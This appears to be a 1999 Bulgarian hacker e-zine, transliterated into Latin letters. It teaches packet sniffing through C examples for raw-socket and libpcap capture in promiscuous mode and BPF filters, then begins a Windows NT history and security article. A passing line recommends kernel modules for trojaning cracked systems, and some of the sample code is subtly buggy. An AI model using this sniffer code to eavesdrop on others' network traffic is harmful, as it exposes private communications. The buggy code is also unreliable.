wsyshtnost obsht interfejs kym syotwetnite funkcii ot nisko niwo za nqkoq
operacionna sistema, predostawqjki na programista mnogo dopylnitelni i
polezni wyzmovnosti, kato dump na paketikte wyw fajl, prochitane ot fajl,
BPF filtri i prawila za poluchawane samo na opredeleni paketi, informaciq za
mrevata/hosta. Zatowa, ako poglednete nqkoj arhiw s publichni eksploiti,
shte namerite nqkolko razlichni sniferi, raboteshti samo na opredelena
operacionna sistema.
Nqkolko dumi za izgravdaneto na samiq sniffer. Nemislimo e da se pishe
paketen snifer, bez da se poznawat dostatychno dobre protokolite i paketite,
na koito move da se natyknem. Tyj kato osnownata cel na powecheto sniferi e
podlushwane na TCP wryzki w lokalna mreva, trqbwa da se zapochne ot Ethernet
ramkata, prez IPv4 (ili v6, no za sega towa ne e chak tolkowa neobhodimo) i
samiq TCP hedyr. Tyj kato ne poluchawame dannite kato potok, a razdeleni na
otdelni paketi, trqbwa da si sglobim neshto kato mini-TCP/IP-stek, za da
movem da prosledim otdelnite logicheski TCP sesii (w qdroto tazi rabota se
wyrshi ot TCP multiplexer).
struct ethhdr eth;
struct iphdr ip;
struct tcphdr tcp;
[... data ...]
Razbira se, movem da podlsushwame ICMP, IGMP, UDP i wsichko drugo, koeto
move da se prekara wyrhu IPv4, stiga da movem korektrno da razoznaem
protokola.
#define MAC_LEN 6
struct ethhdr {
u_char dst_addr[MAC_LEN];
u_char src_addr[MAC_LEN];
u_short protocol;
};
struct iphdr {
u_char ver_ihl;
u_char tos;
u_short total_len;
u_short id;
u_short frag_offset;
u_char ttl;
u_char protocol;
u_short checksum;
u_long src_addr;
u_long dst_addr;
};
struct tcphdr {
u_short src_port;
u_short dst_port;
u_long sequence;
u_long acq_seq;
u_short flags;
u_short window;
u_short checksum;
u_short urg_ptr;
};
Towa e priblizitelnata shema na dejswie (algoritym) na snifyra w psewdokod
(mrazq blokowi shemi):
while (we_want_to_sniff) {
packet = read_raw_packet();
if (starts_new_connection(packet) && port_is_interesting(packet))
add_to_stack(connection(packet));
if (packet_is_part_of_tracked_connection(packet)) {
log(packet);
if (we_have_logged_enough(connection(packet)) ||
packet_closes_connection(packet)))
remove_from_stack(connection(packet));
}
}
2.1. Example of Linux SOCK_PACKET usage
Za dostyp do link layer-a na opredelen interfejs Linux predostawq specialen
tip socket - SOCK_PACKET, pri kojto movem da poluchim/izpratim ne prosto
IPv4 + ramka, a da izgradim paketa zapochwajki Ethernet, PPP, SLIP ili
kakywto drug protokol polzwame za wryzka po syotwetniq interfejs (t.e. ot
Link Layer).
Za da poluchim wsichki interesuwashti ni paketi (wkljuchitelno i tezi, koito
ne sa za nas), trqbwa syotwetniqt interfejs da e s wdignat flag promiscuous
(IFF_PROMISC). W Linux towa stawa chrez strukturata ifreq:
struct ifreq
{
#define IFNAMSIZ 16
union
{
char ifrn_name[IFNAMSIZ];
} ifr_ifrn;
union {
struct sockaddr ifru_addr;
struct sockaddr ifru_dstaddr;
struct sockaddr ifru_broadaddr;
struct sockaddr ifru_netmask;
struct sockaddr ifru_hwaddr;
short ifru_flags;
int ifru_ivalue;
int ifru_mtu;
struct ifmap ifru_map;
char ifru_slave[IFNAMSIZ];
char ifru_newname[IFNAMSIZ];
char * ifru_data;
} ifr_ifru;
};
#define ifr_name ifr_ifrn.ifrn_name /* interface name */
#define ifr_hwaddr ifr_ifru.ifru_hwaddr /* MAC address */
#define ifr_addr ifr_ifru.ifru_addr /* address */
#define ifr_dstaddr ifr_ifru.ifru_dstaddr /* other end of p-p lnk */
#define ifr_broadaddr ifr_ifru.ifru_broadaddr /* broadcast address */
#define ifr_netmask ifr_ifru.ifru_netmask /* interface net mask */
#define ifr_flags ifr_ifru.ifru_flags /* flags */
#define ifr_metric ifr_ifru.ifru_ivalue /* metric */
#define ifr_mtu ifr_ifru.ifru_mtu /* mtu */
#define ifr_map ifr_ifru.ifru_map /* device map */
#define ifr_slave ifr_ifru.ifru_slave /* slave device */
#define ifr_data ifr_ifru.ifru_data /* for use by interface */
#define ifr_ifindex ifr_ifru.ifru_ivalue /* interface index */
#define ifr_bandwidth ifr_ifru.ifru_ivalue /* link bandwidth */
#define ifr_qlen ifr_ifru.ifru_ivalue /* Queue length */
#define ifr_newname ifr_ifru.ifru_newname /* New name */
i chrez SIOCGIFFLAGS (Socket I/O Control Get Interface Flags) i SIOCSIFFLAGS
(Socket I/O Control Set Interface Flags) ioctl() izwikwaniq. Edinstweniqt
obsht parametyr za wsichki izwikwaniq e ifr_name, ostanalite se izpolzwat
spored syotwetnata operaciq. Informaciq za konfiguraciqta na wsichki
nalichni interfejsi move da se wzeme chrez SIOCGIFCONF, kato se izpolzwa
strukturata ifconf:
struct ifconf
{
int ifc_len;
union
{
char * ifcu_buf;
struct ifreq *ifcu_req;
} ifc_ifcu;
};
#define ifc_buf ifc_ifcu.ifcu_buf
#define ifc_req ifc_ifcu.ifcu_req
W ifc_len se podawa razmer na bufera ifcu_buf, kojto shte poluchi ifreq
strukturite za wsichki interfejsi. Pri nedostatychno golqm bufer kernela
wryshta informaciq samo kolkoto buferyt move da prieme, bez da dawa greshka.
Stojnostta na ifc_len se promenq na syotwetniq broj. Wsichko towa e
neobhodimo, za da movem da wzemem spisyka s podhodqshti interfejsi za
podslushwane, w sluchaj, che nikoj ot standartnite ne syshtestwuwa, oshte
poweche che ne e zadylvitelno wseki ot tqh da otgowqrq na harduerno
ustrojstwo - kernel modul move da syzdade specialen interfejs za VPN, pri
koeto movem da podslushwame dannite predi oshte da sa kodirani. Za powecheto
interfejsi obache, wkljuchitelno i pri podslushwane prez libpcap, move da
ima dopylnitelni danni kym ramkata na paketa, chesto razlichni za ednakwi
interfejsi w razlichni operacionni sistemi.
Kogato iskame da podslushwame opredelen interfejs se izpolzwa bind()
funkciqta, po syshtiq nachin, kakto i pri normalnite soketi.
struct sockaddr {
unsigned short sa_family;
char sa_data[14];
};
w sa_data se zadawa kato null-terminated string imeto na interfejsa.
-<sockpacket.c>---------------------------------------------------------
/* Copyright (C) 1999 kay@phreedom.org; All rights reserved */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/ioctl.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <netinet/ip.h>
#include <netinet/if_ether.h>
#include <linux/if.h>
#include "pdump.h"
int
main(int argc, char **argv)
{
struct ifreq ifr; /* Linux interface request control structure */
short ifr_flags_orig; /* Initial flags if interface */
int sockfd; /* Socket descriptor */
u_char sp[2000];
int err;
printf("Example of non-portable packet sniffer for Linux\n");
/* We want only Ethernet frames containing IP data */
sockfd = socket(PF_PACKET, SOCK_PACKET, htons(ETH_P_IP));
if (sockfd < 0) {
perror("socket");
exit(1);
}
/* Make the interface promiscuous */
strcpy(ifr.ifr_name, INTERFACE);
err = ioctl(sockfd, SIOCGIFFLAGS, &ifr);
if (err < 0) {
perror("SIOCGIFFLAGS");
exit(1);
}
ifr_flags_orig = ifr.ifr_flags;
ifr.ifr_flags |= IFF_PROMISC;
err = ioctl(sockfd, SIOCSIFFLAGS, &ifr);
if (err < 0) {
perror("SIOCSIFFLAGS");
exit(1);
}
/* Read one packet */
err = read(sockfd, &sp, sizeof(sp));
if (err < 0) {
perror("read");
exit(0);
}
/* Dump what we cought */
printf("Dumping %i bytes:\n", err);
dump_eth((struct ethhdr *) &sp);
dump_ip((struct iphdr *) &sp+14L);
dump_hex((void *) &sp, err, 2, 16);
dump_ascii((void *) &sp, err, 16);
printf("\n\n");
/* Restore original interface flags */
ifr.ifr_flags = ifr_flags_orig;
if (ioctl(sockfd, SIOCSIFFLAGS, &ifr) < 0) {
perror("SIOCSIFFLAGS");
exit(1);
}
close(sockfd);
return EXIT_SUCCESS;
}
/* eof */
-</sockpacket.c>--------------------------------------------------------
-<getifconf.c>----------------------------------------------------------
/* Copyright 1999 Kay <kay@phreedom.org>. All rights Reserved */
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/if.h>
#include <linux/if_ether.h>
int main()
{
struct ifconf ifc;
struct ifreq ifr_x[20];
int sockfd, err;
sockfd = socket(PF_PACKET, SOCK_PACKET, 0);
if (sockfd < 0) {
perror("socket");
exit(1);
}
ifc.ifc_len = 20 * sizeof(struct ifreq);
ifc.ifc_req = ifr_x;
err = ioctl(sockfd, SIOCGIFCONF, &ifc);
perror("ioctl");
printf("retrieved info for %i interface(s)\n",
ifc.ifc_len / sizeof(struct ifreq));
for (err = 0; err < ifc.ifc_len / sizeof(struct ifreq); err++)
printf("%s\n", ifr_x[err].ifr_name);
return EXIT_SUCCESS;
}
/* eof */
-</getifconf.c>---------------------------------------------------------
2.2. Libpcap primer
Slednata programa wyrshi absolutno syshtite funkcii kato sockpacket.c, i
wsichko e poweche ot ochewidno kak raboti.
-<libpcap.c>------------------------------------------------------------
/* Portable packet sniffer example - needs libpcap in order to compile
* Copyright (c) 1999 kay@phreedom.org; All rights reserved */
#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ether.h>
#include "pdump.h"
int main(int argc, char **argv)
{
pcap_t *pcap; /* PCAP descriptor */
u_char *packet; /* Our newly captured packet */
struct pcap_pkthdr pkthdr; /* PCAP packet information structure */
printf("Example of portable packet sniffer using Libpcap\n");
/* Obtain a descriptor for interface, capture no more than
* 8192 octets, set interface to promiscuous mode, 1000 miliseconds
* read timeout, No buffer for error messages */
pcap = pcap_open_live(INTERFACE, 8192, 1, 1000, NULL);
if (pcap == NULL) {
perror("pcap_open_live");
exit(EXIT_FAILURE);
}
/* Get the next packet from the queue */
packet = (u_char *) pcap_next(pcap, &pkthdr);
if (packet != NULL) {
packet += OFFSET;
/* Dump the packet in various forms */
printf("Dumping %i bytes:\n", pkthdr.caplen);
dump_eth((struct ethhdr *) packet);
dump_ip((struct iphdr *) packet);
dump_hex((void *) packet, pkthdr.caplen, 2, 16);
dump_ascii((void *) packet, pkthdr.caplen, 16);
printf("\n\n");
} else {
pcap_perror(pcap, "pcap_next returned NULL");
}
/* Enough for now ... */
pcap_close(pcap);
return EXIT_SUCCESS;
}
/* eof */
-</libpcap.c>-----------------------------------------------------------
const u_char *pcap_next(pcap_t *, struct pcap_pkthdr *);
Ochewidno osnownata rabota se wyrshi ot funkciqta pcap_next(), koqto wryshta
ukazatel kym sledwashtiq paket ot opashkata. Sled towa dejstwieto na
sniffera e napylno analogichno na predishniq primer. Razbira se, tezi
primeri w nikakyw sluchaj ne sa izpolzwaemi w tozi si wid, no sa edna dobra
osnowa.
2.3. BPF Packet filter programs
Chrez Berkeley Packet Filter move da se zadade programa, koqto da filtrira
whodqshtite paketi po opredeleni priznaci. Takawa programa se systoi ot
masiw BPF instrukcii "izpylnqwani" na wirtualna mashina. Intrukciite dosta
napomnqt asembleren ezik. Towa e izkljuchitelno moshten mehanizym, no
syzdawaneto na tezi programi chesto e prekaleno slovno, za da si struwa da
gi pishem. Sledniq primer ot man-stranicata pokazwa programa, izbirashta
samo IP paketi mevdu 128.3.112.15 i 128.3.112.35:
struct bpf_insn insns[] = {
BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 12), BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K,
ETHERTYPE_IP, 0, 8), BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 26),
BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 0x8003700f, 0, 2),
BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 30), BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K,
0x80037023, 3, 4), BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K, 0x80037023, 0, 3),
BPF_STMT(BPF_LD+BPF_H+BPF_ABS, 30), BPF_JUMP(BPF_JMP+BPF_JEQ+BPF_K,
0x8003700f, 0, 1), BPF_STMT(BPF_RET+BPF_K, (u_int)-1),
BPF_STMT(BPF_RET+BPF_K, 0),
};
Za towa (kakto i pri normalnite ezici), w LBL e syzdaden ezik ot wisoko
niwo, kojto se "kompilira" do BPF-instrukcii. Pylnata dokumentaciq se namira
w man-stranicata na tcpdump(8). Neka poglednem sledniq primer:
-<pfilter.c>------------------------------------------------------------
/* Packet filter example
* Copyright (c) 1999 kay@phreedom.org; All rights reserved */
#include <stdio.h>
#include <stdlib.h>
#include <pcap.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ether.h>
#include "pdump.h"
int main(int argc, char **argv)
{
pcap_t *pcap; /* PCAP descriptor */
u_char *packet; /* Our newly captured packet */
struct pcap_pkthdr pkthdr; /* PCAP packet information structure */
struct bpf_program fp; /* Structure to hold the compiled prog */
char pfprogram[] = "ip host 128.3.112.15 and 128.3.112.35";
printf("Example of portable packet sniffer using Libpcap\n");
/* Obtain a descriptor for interface, capture no more than
* 8192 octets, set interface to promiscuous mode, 1000 miliseconds
* read timeout, No buffer for error messages */
pcap = pcap_open_live(INTERFACE, 8192, 1, 1000, NULL);
if (pcap == NULL) {
perror("pcap_open_live");
exit(EXIT_FAILURE);
}
/* Compile and set the filter program */
if (pcap_compile(pcap, &fp, pfprogram, 1, 0x0) == -1) {
pcap_perror(pcap, "pcap_compile");
exit(EXIT_FAILURE);
}
if (pcap_setfilter(pcap, &fp) == -1) {
pcap_perror(pcap, "pcap_setfilter");
exit(EXIT_FAILURE);
}
/* Get the next packet from the queue */
packet = (u_char *) pcap_next(pcap, &pkthdr);
if (packet) {
/* Dump the packet in various forms */
printf("Dumping %u bytes:\n", pkthdr.caplen);
packet += OFFSET;
dump_eth((struct ethhdr *) packet);
dump_ip((struct iphdr *) packet);
dump_hex((void *) packet, pkthdr.caplen, 2, 16);
dump_ascii((void *) packet, pkthdr.caplen, 16);
printf("\n\n");
} else {
printf("Packet not captured because of filter\n");
}
/* Enough for now ... */
pcap_close(pcap);
return EXIT_SUCCESS;
}
/* eof */
-</pfilter.c>-----------------------------------------------------------
Izrazyt "ip host 128.3.112.15 and 128.3.112.35" se prewevda w BPF programa
ot pcap_compile() i togawa se prikachwa kym PCAP descriptora chrez
pcap_setfilter(). Dosta po-lesno ot predniq primer, nali?
Linux Socket Filter (ili LSF) e Linux-wersiqta na BPF, s nqkoi dopylneniq.
Imenno: toj pozwolqwa na potrebitelski programi da prikachat filtri kym
tehnite soketi i po tozi nachin da filtrirat wryzkite si; syshto taka toj e
po-lesen za polzwane po otnoshenie na "prikachwaneto" si. Samite filtyrni
programi sa napylno identichni.
2.4. Loadable kernel modules
Loadable kernel modules (LKM) sa bili syzdadeni, za da se predostawi
mehanizym za dinamichno dobawqne na nowi funkcii w qdroto na operacionnata
sistema, bez da e nuven reboot ili drug wid prekyswane na normalnata rabota.
LKM, koito rabotqt w ring 0 pri powecheto OS, estestweno imat prawa wyrhu
cqlata pamet i mogat da promenqt wytreshni strukturi na kernel-a kakto i da
se skriqt ot ochite na administratora izpolzwajki razlichni tehniki. Towa e
dosta dobyr nachin za trojanizirane na crack-nati sistemi. Kokretno za Linux
kernel interfejsite i pisaneto na moduli sa mnogo dobre opisani - za obshto
wywedenie poglednete "The Linux Kernel" i "Linux Kernel Hacker's Guide" ot
Linux Documentation Project. Temata za LKM e podrobno opisana wyw Phrack 55.
3. Bibliography and additional files
Man pages: pcap(3), setsockopt(2), bpf(7)
RFC's: 791, 792, 793, 894
IEEE 802 (esp. 802.3)
UTSL: Linux kernel 2.2.12, libpcap 0.4
Libpcap: ftp://ftp.ee.lbl.gov
Linux Documentation Project: http://metalab.unc.edu/LDP
Phrack Magazine: http://www.phrack.com
W primerite za SOCK_PACKET i PCAP sa izpolzwani funkcii ot pdump.c za
pokazwane na HEX/ASCII/IP/Ethernet danni/strukturi na terminal.
Linux-specifichnite primeri za izprobwani na Debian GNU/Linux 2.1 (kernel
2.0.36 glibc 2.0.7), Debian GNU/Linux 2.2 (kernel 2.2.12 glibc 2.1.2).
PCAP-primerite sa izprobwani na Debian GNU/Linux 2.2 + libpcap 0.4 i OpenBSD
2.4 GENERIC, libpcap 0.4.
-<pdump.h>--------------------------------------------------------------
/* Packet dumping routines, Copyright (c) 1999 Kay <kay@PHREEDOM.ORG> */
void dump_eth(struct ethhdr *);
void dump_ip(struct iphdr *);
void dump_hex(void *, u_long, u_long, u_long);
void dump_ascii(void *, u_long, u_long);
-</pdump.h>-------------------------------------------------------------
-<pdump.c>--------------------------------------------------------------
/* Packet dumping routines, Copyright (c) 1999 Kay <kay@PHREEDOM.ORG> */
#include <stdio.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/tcp.h>
#include <netinet/ether.h>
void dump_eth(struct ethhdr *eth)
{
int cnt;
printf("\th_dest =");
for (cnt = 0; cnt < ETH_ALEN; cnt++)
printf(" %X", eth->h_dest[cnt]);
printf(";\n\th_source =");
for (cnt = 0; cnt < ETH_ALEN; cnt++)
printf(" %X", eth->h_source[cnt]);
printf(";\n\th_proto = %X;\n", eth->h_proto);
fflush(stdout);
}
void dump_ip(struct iphdr *ip)
{
struct protoent *pp;
struct in_addr ia;
printf("\tihl = %X;\n", ip->ihl);
printf("\tversion = %X;\n", ip->version);
printf("\ttos = %X;\n", ip->tos);
printf("\ttot_len = %X;\n", ip->tot_len);
printf("\tid = %X;\n", ip->id);
printf("\tfrag_off = %X;\n", ip->frag_off);
printf("\tttl = %X;\n", ip->ttl);
printf("\tprotocol = %X;", ip->protocol);
pp = getprotobynumber(ip->protocol);
if (pp == NULL) printf("\n"), perror(NULL);
else printf("\t(%s)\n", pp->p_name);
printf("\tcheck = %X;\n", ip->check);
ia.s_addr = ip->saddr;
printf("\tsaddr = %X;\t(%s)\n", ip->saddr, inet_ntoa(ia));
ia.s_addr = ip->daddr;
printf("\tdaddr = %X;\t(%s)\n", ip->daddr, inet_ntoa(ia));
fflush(stdout);
}
/* Its obvious: *data, how many octets, interval of spaces,
interval of '\n'-s */
void dump_hex(void *bare, u_long octets, u_long int_sp, u_long int_nl)
{
u_long s;
u_long spc=0, nlc=0;
char *buf = (char *) bare;
for (s=0; s<octets; s++) {
if ((u_char)buf[s]<0x10) printf("0");
printf("%X", (u_char)buf[s]);
if (++spc==int_sp) printf(" "), spc=0;
if (++nlc==int_nl) printf("\n"), nlc=0;
fflush(stdout);
}
}
int is_printable(char c)
{
if ((c >= '1')&&(c <= '0')) return 1;
if ((c >= 'A')&&(c <= 'Z')) return 1;
if ((c >= 'a')&&(c <= 'z')) return 1;
return 0;
}
void dump_ascii(void *bare, u_long octets, u_long int_nl)
{
u_long s;
u_long nlc=0;
char *buf = (char *) bare;
for(s=0; s<octets; s++) {
printf("%c", is_printable(buf[s])?buf[s]:'.');
if (++nlc==int_nl) printf("\n"), nlc=0;
fflush(stdout);
}
}
/* eof */
-</pdump.c>-------------------------------------------------------------
-<Makefile>-------------------------------------------------------------
# Makefile for examples (c) 1999 kay <kay@phreedom.org>
# Edit to suit your system.
# In case of problems when compiling on Linux 2.0 systems, try
# replacing AF_PACKET with AF_INET.
# Set interface to sniff. Some common offsets:
# Ethernet (eth0, le0) offset 0
# Loopback (lo, lo0, ...) offset 4
# PPP link (ppp0, ppp1, ...) offset 0
DEFS=-DINTERFACE=\"lo\" -DOFFSET=4
CC=cc
RM=rm -f
CFLAGS=-O2 -Wall -pipe $(DEFS)
LIBPCAP=-lpcap
default:
@echo "Type one of:"
@echo " make pcap -- build only PCAP examples"
@echo " make all -- build PCAP and Linux-specific examples"
all: libpcap pfilter sockpacket lspromisc getifconf
pcap: libpcap pfilter
.c.o: $@
$(CC) $(CFLAGS) -c $<
sockpacket: pdump.o sockpacket.o
$(CC) $(CFLAGS) -o sockpacket sockpacket.o pdump.o
pfilter: pdump.o pfilter.o
$(CC) $(CFLAGS) -o pfilter pdump.o pfilter.o $(LIBPCAP)
libpcap: libpcap.o pdump.o
$(CC) $(CFLAGS) -o libpcap libpcap.o pdump.o $(LIBPCAP)
getifconf: getifconf.c
$(CC) $(CFLAGS) -o getifconf getifconf.c
lspromisc: lspromisc.c
$(CC) $(CFLAGS) -o lspromisc lspromisc.c
clean:
$(RM) pdump.o sockpacket.o sockpacket libpcap.o \
libpcap getifconf lspromisc pfilter pfilter.o
-</Makefile>------------------------------------------------------------
-<lspromisc.c>----------------------------------------------------------
/* Copyright 1999 kay@phreedom.org. All rights Reserved */
#include <stdio.h>
#include <unistd.h>
#include <string.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>
#include <linux/if.h>
int main()
{
struct ifconf ifc;
struct ifreq ifr_x[50];
int sockfd, err, i;
sockfd = socket(PF_PACKET, SOCK_PACKET, 0);
if (sockfd < 0) {
perror("socket");
exit(1);
}
ifc.ifc_len = 50 * sizeof(struct ifreq);
ifc.ifc_req = ifr_x;
err = ioctl(sockfd, SIOCGIFCONF, &ifc);
if (err == -1) return EXIT_FAILURE;
for (i = 0; i < ifc.ifc_len / sizeof(struct ifreq); i++) {
err = ioctl(sockfd, SIOCGIFFLAGS, &ifr_x[i]);
if (err == -1) perror("SIOCGIFFLAGS: ");
else if(ifr_x[i].ifr_flags & IFF_PROMISC)
printf("Interface %s is promiscuous\n",
ifr_x[i].ifr_name);
}
return EXIT_SUCCESS;
}
/* eof */
-</lspromisc.c>---------------------------------------------------------
>> EOA <<
]]><![CDATA[
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú#03ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
[ a r t i c l e ] [ a u t h o r ]
Windows NT Security Solar Eclipse
-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-ú-
1) Introduction
Windows NT e suwremenna operacionna sistema, izpolzwana predimno za serverni
proloveniq. Tazi statiq shte razgleda osnownite idei w designa na WinNT,
nqkoi aspekti ot wutreshnata i struktura, kakto i mrevowite i wuzmovnosti.
Shte bude nablegnato na sigurnosta na operacionnata sistema, kakto i na
propuskite w neq.
Windows NT e razraboten ot ekip programisti, naeti ot Microsoft specialno za
tazi cel. Powecheto ot tqh sa uchastwali w razrabotkata na operacionnata
sistema VMS za VAX, i zatowa ne e uchudwashto che namirame dosta obshti
neshta w dwete sistemi. Proektiraneto na WinNT e zapochnalo prez Noemwri
1988 godina, a purwata versiq (Windows NT 3.1) izliza na pazara 5 godini
po-kusno: prez 1993. Interesno e obqsnenieto koeto dawa edin ot
rukowoditelite na proekta za towa che purwata versiq ne e 1.0 - spored nego
desingerite sa se stremili kum po-golqma suwmestimost mevdu WinNT i Win3.1,
i zatowa sa reshili funkciqta za wrushtane na versiqta i w dwete opracionni
sistemi da wrushta 3.1 Lichno na men towa obqsnenie mi se struwa stranno, no
Microsoft sa izwestni s towa che obichat podobni trikowe.
Purwonachalno Windows NT 3.1 poddurva x86 i MIPS architekturi. Suwsem malko
po-kusno e dobawena i poddruvka na Alpha. Sledwashtite versii - 3.5 i 3.51
sa izlizat suotwetno prez 1994 i 1995 godina. WinNT weche poddurva i PowerPC
procesori.
1996 godina e kluchowa w razwitieto na NT. Togawa izliza versiq 4.0, koqto
uspqwa da nalovi NT kato operacionna sistema, koqto trqbwa da bude wzimana
naseriozno. Edin zabelevim element w nowata versiq e GUI-to, koeto e podobno
na towa na Win95, a ne na Win3.1 Poradi 'pazarni prichini' (mraza tazi duma)
poddruvkata za MIPS i PowerPC e izostawena.
Sled nqkolko meseca se ochakwa poqwqwaneto na Windows NT 5, koito weche nqma
da se kazwa taka, a shte se kazwa Windows 2000 (mnogo tupo). Po-nadolu
shte spomena za nowostite w nego.
Kak izglevda Windows NT w momenta? Ami do golqma stepen prilicha na Win9x,
no ima i nqkolko mnogo wavni razliki.
1.1) Mrevowa poddruvka
Windows NT e mrevowa operacionna sistema. Poddurvat se raznoobrazni
protokoli i ima golqmo raznoobrazie ot utilita za dostup do mrevi - kato se
zapochne ot standartnite ftp, telnet, ping i se stigne do sredstwa za dosup
do CIFS mreva (towa e standartnata mreva w Windows sreda, bazirana e na SMB
i NetBIOS).
1.2) Stabilnost
Ima ogromna razlika mevdu 9x bozite i NT. Wupreki che priloveniqta pak
zabiwat, towa se sluchwa samo pri bugowe w samite priloveniq. Zabiwane na
cqlata operacionna sistema se sluchwa dosta rqdko - za razlika ot 9x, kudeto
siniq ekran e ne izkluchenie, a prawilo. Ako se zanimawate s dejnost,
iziskwashta Windows sreda (naprimer web-design ili Photoshop) goreshto wi
preporuchwam da rabotite s Windows NT, a ne s Windows 98.
1.3) Proizwoditelnost
Osnowniqt problem na NT-to e proizwoditelnosta mu. Kogato Microsoft sa
zapochnali da go proektirat, te sa iskali da naprawqt naslednik na 16
bitowiq Windows. No sistemnite iziskwaniq na NT sa bili tolkowa golemi, che
toi ne e stawal za nishto drugo, oswen za serveri. Towa weche ne e taka.
Cenite na hardware-a padnaha dostatuchno, za da move na wsqka
srednostatisticheska sistema da se podkara Windows NT bez osobeni
zatrudneniq (wupreki towa NT ne move da se meri s Linux, koito move da se
pusne i na 486 i pak da raboti suwsem prilichno). Sledwashtata versiq na NT,
Windows 2000, shte e naslednik i zamestitel kakto na NT, taka i na Windows
98. Towa shte wkara NT w shiroka upotreba sred narodnite masi (makar i pod
drugo ime).
1.4) Sigurnost
Pri Windows 98 koncepciqta za useri i groupi pochti napulno otsustwa. Da ne
goworim za prawa na dosput na failowete. Windows NT e multiuser sreda i
ima suwsem prilichna sistema za zashtita na edin user ot drug. Failowiqt
dostup se uprawlqwa ot t.n. ACL - access control list, koito e wzet ot VMS.
Wupreki towa administratora na NT e po-nezashtiten, otkolkoto pri Unix.
Poweche za towa - po-dolu.
1.5) GUI
GUI-to na Windows NT 4.0 e absolutno sushtoto kato pri Windows 95. Sled
instalirane na IE4 rezultata e absolutno kopie na Windows 98. Ima i
poddruvka na comanden red, kato shell-a ima poweche funkcii ot standartniq
command.com, no wupreki towa nqma golqma polza ot nego. Prosto w ideologiqta
na WinNT nqma mqsto za komanden red - naprimer nqma programa s koqto ot
komandniq red da se dobawi user ili da se widqt procesite. Kompensiraneto na
tozi nedostatuk stawa chrez dopulnitelni programi (ne Microsoft-ski)
1.6) Poddruvka na DOS i Win16 priloveniq.
Ne wsichki DOS priloveniq wurwqt, a tezi koito wurwqt, ne winagi wurwqt
kakto trqbwa. Ima problemi s nqkoi programi koito accesswat direktno
hardwara i programi izpolzwashti 32bit extender. Sushto taka nqkoi programi
ne se oprawqt sus synchronizaciqta - timera na NT-to ne raboti prawilno s
DOS programi. Dosega ne sum uspql da si podkaram zwukowata karta s DOS igri.
Oswen towa e bawno - pri puskane na obiknowen EDIT.COM i scrolirane w dos
kutiq, procesora se natowarwa 50% (za srawnenie - Winamp zaema samo 11%)
Win16 se poddurva znachitelno po-dobre, wupreki che pak e po-bawno ot chist
Windows 3.1
1.7) Igri
Eh... towa mu e bolnoto mqsto - WinNT poddurva samo DirectX 3, koeto mu
prechi da raboti s po-nowite igri. Naprimer Worms 2 raboti idealno pod NT,
no Worms 3 ne. Windows NT 4.0 ne e podhodqst za game clubowe, no Windows
2000 shte ima pulna poddruvka na wschko, koeto i Windows 98 ima.
2) Poddruvka na UNIX priloveniq i portwane
Poradi towa che UNIX e po-dobra operacionna sistema, potrebitelite na WinNT
imat nuvda po-nqkakuw nachin da mogat da izpolzwat UNIX priloveniq. (ne sum
chuwal nqkoi admin na UNIX da izpolzwa neshto, portnato ot NT - kakwo
po-dobro swidetelstwo ot towa za prewuzhodstwoto na UNIX-a).
Architekturata na Windows NT e izgradena na basata na layeri, koeto wnasq
izwestna guwkawost. Kernela na NT predostawq funkcii za dostup do
hardware-a, grivi se za procesite i threadowete, no high-level funkciite ne
se izpulnqwat tam. Pri prektiraneto na NT designerite sa otcheli
neobhodimosta da se izpulnqwat programi za razlichni operacionni sistemi na
NT i sa otdelili kernela ot towa koeto e nad nego. W Windows NT
sushtestwuwat 3 t.n. 'environmental subsystems', koito izpulnqwat rolqta na
posrednici mevdu programite i kerenala. Win32 subsistemata predostawq na
programite funkciite na Win32 API-to, kato sled towa gi translira w system
calls na kernela. OS/2 subsistemata pozwolqwa izpulnenieto na OS/2 programi
pod NT, kato translira funkciite na OS/2 API-to kum kernela na NT.
Podddurvat se samo 16 bitowi OS/2 priloveniq i to samo za OS/2 versiq 1.2
Sushtestwuwa i POSIX subsitema, pozwolqwashta da se puskat UNIX priloveniq
pod NT. Za celta e neobhodimo samo te da budat prekompilirani kato Windows
POSIX programi. Za suvalenie standartnata POSIX subsitema poddurva samo
standarta POSIX 1003.1 ot 1990 godina, koeto prawi pisaneto na neshto
poweche ot 'Hello world' programi pochti newuzmovno.
Naisitna e valko che ideqta za edinen portable kernel, koito da wurwi na
x86, Alpha, MIPS i PowerPC, a puk nad nego da ima razlichni 'environmental
subsystems' chrez koito da se izpulnqwat programi za razlichni operacionni
systemi, ne e uspqla da se razwie. Microsoft (kakto obiknoweno) sa
prenebregnali purwonachalniq design, prestawajki da razwiwat drugite
subsistemi za smetka na Win32. W Windows NT 4.0 GDI i USER modulite na
Win32 subsitemata sa nabutani direktno w kernela, unishtovawajki ideqta za
mnogo nezawisimi edna ot druga subsistemi.
Oswen standartnata POSIX poddruvka w NT, sushtestwuwat oshte nqkolko nachina
za izpolzwane na UNIX programi. OpenNT (www.opennt.com) e zamestitel na
standtartnata POSIX subsitema, koqto poddurva dosta po-pulen nabor ot
standartni funkcii. Towa pozwolqwa prekompiliraneto na normalni UNIX
priloveniq bez pochti nikakuw problem.
